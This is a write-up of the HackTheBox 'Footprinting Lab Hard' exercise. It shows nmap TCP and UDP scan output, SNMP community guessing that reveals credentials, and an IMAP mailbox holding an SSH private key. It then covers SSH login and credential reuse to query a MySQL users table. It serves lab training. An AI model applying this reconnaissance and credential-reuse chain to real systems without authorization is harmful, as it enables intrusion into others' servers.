Footprinting Lab Hard
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Footprinting
- 🔗 Link: Footprinting Lab Hard
❓Question¶
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
📋 Walkthrough¶
Start with fast and script scan with nmap
nmap -p- --min-rate=10000 10.129.132.182
PORT STATE SERVICE
22/tcp open ssh
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
nmap -p 22,110,143,993,995 -sCV 10.129.132.182
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_pop3-capabilities: CAPA TOP USER SASL(PLAIN) UIDL RESP-CODES STLS PIPELINING AUTH-RESP-CODE
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ENABLE more STARTTLS LOGIN-REFERRALS SASL-IR Pre-login OK post-login IDLE have LITERAL+ listed capabilities AUTH=PLAINA0001 ID IMAP4rev1
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ENABLE more AUTH=PLAINA0001 SASL-IR Pre-login OK post-login IDLE have LITERAL+ listed capabilities ID LOGIN-REFERRALS IMAP4rev1
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_pop3-capabilities: SASL(PLAIN) CAPA UIDL RESP-CODES TOP USER PIPELINING AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
udp scan. sudo nmap -sU 10.129.132.182
Not shown: 993 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
snmpwalk with public community, but no luck. We can try to enumerate with some community wordlist, but in the description of the challenge they say that is a backup server. Maybe it is backup? Yes! We can find credentials Are they of ssh? No, user tom can't login using ssh. Try to login with imap using evolution. In the email we can find a ssh private key. We can use it to login. We are in! I notice that .bash_history has some infromation. There's a command Try use the same credentials of imap, it works! mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.01 sec)
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
users table. Answer
[REDACTED]